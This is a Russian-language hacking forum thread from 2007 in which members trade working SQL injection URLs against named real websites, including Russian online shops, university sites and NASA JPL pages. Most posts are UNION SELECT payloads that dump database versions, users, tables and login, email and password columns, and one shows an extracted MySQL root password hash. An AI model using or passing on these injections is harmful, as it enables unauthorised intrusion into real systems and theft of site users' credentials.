SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    естественно не подберешь -))
    колонок то 9 (;
    http://www.webkoleso.ru/index.php?pageId=-1+union+select+1,2,3,4,5,6,7,8,9/*
    сейчас буду дальше искать... Loading [|||||........]

    version() - 4.0.26
    database() - udb4037
    4.0.26:Uwww4037S@localhost

    http://www.webkoleso.ru/index.php?pageId=-1+union+select+1,2,3,concat(version(),char(58),user()),database(),6,7,8,9/*
     
    #2981 Calcutta, 29 Aug 2007
    Last edited: 29 Aug 2007
    1 person likes this.
  2. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    http://www.teamarena.ru/demo/99999999+UNION+SELECT+1,database(),version(),4,5,user(),7,8,9,10,11,12,13/
    хотел докапаться до базы е-маилов и паролей, не получилось. но походу нада дальше учиться и разбираться... подобрал стандарт.. useless :-\
     
  3. Ky3bMu4

    Ky3bMu4 Elder - Старейшина

    Joined:
    3 Feb 2007
    Messages:
    487
    Likes Received:
    284
    Reputations:
    42
    Вот пара .edu c PR 6
    Code:
    http://www.choices.edu/resources/detail.php?id=-49%20UNION%20SELECT%201,convert(concat_ws(0x3b,version(),user(),database())us
    
    ing%20latin1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
    http://www.hum.utah.edu/display.php?&pageId=-2037%20UNION%20SELECT%201,2,3,4,5,6,7,concat(version(),user()),9,10,11/* 
    
     
    3 people like this.
  4. Joker-jar

    Joker-jar Elder - Старейшина

    Joined:
    11 Mar 2007
    Messages:
    581
    Likes Received:
    205
    Reputations:
    37
    еще так можно
     
    2 people like this.
  5. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    http://www.sitronics.ru/
     
  6. Y.Dmitriy

    Y.Dmitriy Banned

    Joined:
    14 Mar 2007
    Messages:
    208
    Likes Received:
    85
    Reputations:
    16
    интернет магазин
     
    #2986 Y.Dmitriy, 29 Aug 2007
    Last edited: 29 Aug 2007
  7. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    http://vitesse.ru/
     
    1 person likes this.
  8. _GaLs_

    _GaLs_ Elder - Старейшина

    Joined:
    21 Apr 2006
    Messages:
    431
    Likes Received:
    252
    Reputations:
    48
    Code:
    http://www.jobpages.ru/findrezum.php?a=2&id_rezum=-705+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,mail,15,16,id_resum,18+from+resum+where+id_resum=705/*
    http://www.hardvision.ru/?dir=download&id=2970+union+select+1,2,3,4,5/*
    http://1cent.ru/Shops/search_good.php?limit=1&search_descript=yeah%27union+select+1,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),3,4/*&search_brand=&search_model=&Submit=%C8%F1%EA%E0%F2%FC
    http://www.t-turn.com/article.php?sid=-9999999+union+select+1,2,3,user(),5,6,7,8,9+from+authors/*
    http://www.ruclimat.ru/sts/view.php?id=0+union+select+1,2,3,4,concat(database(),0x20,user(),0x20,version()),6,7,8,9/*
     
  9. n3m0

    n3m0 Elder - Старейшина

    Joined:
    11 May 2007
    Messages:
    133
    Likes Received:
    92
    Reputations:
    11
    http://www.teamarena.ru/demo/99999999+UNION+SELECT+1,2,3,4,5,6,user(),8,9,10,11,12,13/*
    Подставляй туда вместо user() - database()
    У меня работало
     
    1 person likes this.
  10. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    amp.ru
    Code:
    http://www.amp.ru/index.php?page=6+UNION+SELECT+1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+FROM+INFORMATION_SCHEMA.TABLES+--+
     
    1 person likes this.
  11. Серенький

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    sql

    названия таблиц довольно тривиальные
    прямого вывода нет
     
  12. bulbazaur

    bulbazaur Banned

    Joined:
    10 Sep 2006
    Messages:
    125
    Likes Received:
    40
    Reputations:
    10
    типо первый мой скуль))
    HTML:
    http://www.utdallas.edu/calendar/event.php?id=-1175532750+union+select+1,concat(user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13/*
     
    #2992 bulbazaur, 30 Aug 2007
    Last edited: 30 Aug 2007
    2 people like this.
  13. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    вроде не баян, пока на ачате искал, нашел чето похожее, но решил раскрыть тему, к томуже инъекция в другом скрипте:
    Code:
    http://www-robotics.jpl.nasa.gov/news/newsStory.cfm?NewsID=-69%20union%20select%201,2,3,4,5,6,7,8,9,aes_decrypt(aes_encrypt(concat(user,0x3a,password),0x71),0x71),11,12,13,14,15%20from%20mysql.user/*
    root:*1CB7A709BB1423D94D5F2C14E2E929F17BEBF122
     
  14. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    http://www.elephant.ru/index.php?item=3891+union+select+version(),2,database(),user(),5,6,7,8,9,10,11,12,13,14,15,16/*

    elephantru@localhost
    elephantru
    4.1.22-standard-log
    дальше не раскопал :-/
     
  15. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    СПОРТклуб
    Code:
    http://www.sportclub.ru/news.php?id=-46+UNION+SELECT+1,2,3,concat(login,char(58),password),concat(user(),char(58),version(),char(58),database()),6,7,8,9+from+users+--+
    После того как я зашел на форум, интерес к сайту пропал...
     
    1 person likes this.
  16. iRedX

    iRedX Elder - Старейшина

    Joined:
    18 Jun 2002
    Messages:
    117
    Likes Received:
    11
    Reputations:
    9
    motofan.ru

    http://top.motofan.ru/index.php?act=faq

    в поле поиска вставить: '/**/and/**/1=2/**/union/**/select/**/version(),database(),user()/*
     
    1 person likes this.
  17. Dr.Frank

    Dr.Frank Elder - Старейшина

    Joined:
    31 Jul 2002
    Messages:
    301
    Likes Received:
    72
    Reputations:
    12
    irkutsk.rfn.ru
    http://irkutsk.rfn.ru/rnews.html?id=23639+order+by+11--&cid=7

    Дальше не смог... UNION не работает =(
     
  18. t00th

    t00th Banned

    Joined:
    15 Jul 2007
    Messages:
    37
    Likes Received:
    15
    Reputations:
    6
    http://www.elephant.ru/index.php?item=3891+union+select+1,2,concat(name,0x3a,login,),4,5,6,7,8,9,10,11,12,13,14,15,16+from+users/*
     
  19. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    информационное агенство :)
    4 мускул
    код:
    http://www.context-ua.com/km/forum1 .php?act=forum add&botn=456&top=-4' +union+ select+ 1 ,2 ,con cat(lo gin,pas s),4 ,5 ,6 +from+users/*

    дальше не смог :(
     
  20. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    http://soc.jpl.nasa.gov/experience/gallery-story.cfm?id=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,char(47)%2bchar(47)%2bchar(45)%2bchar(45)%2bchar(62)%2bchar(60)%2bchar(98)%2bchar(114)%2bchar(62)%2bchar(60)%2bchar(47)%2bchar(101)%2bchar(109)%2bchar(62)%2bemail%2bchar(58)%2bpassword%2bchar(60)%2bchar(33)%2bchar(45)%2bchar(45),11,null,13,14,15,char(16),char(17),null,19,20%20from%20usersmember--s
     
    1 person likes this.
Thread Status:
Not open for further replies.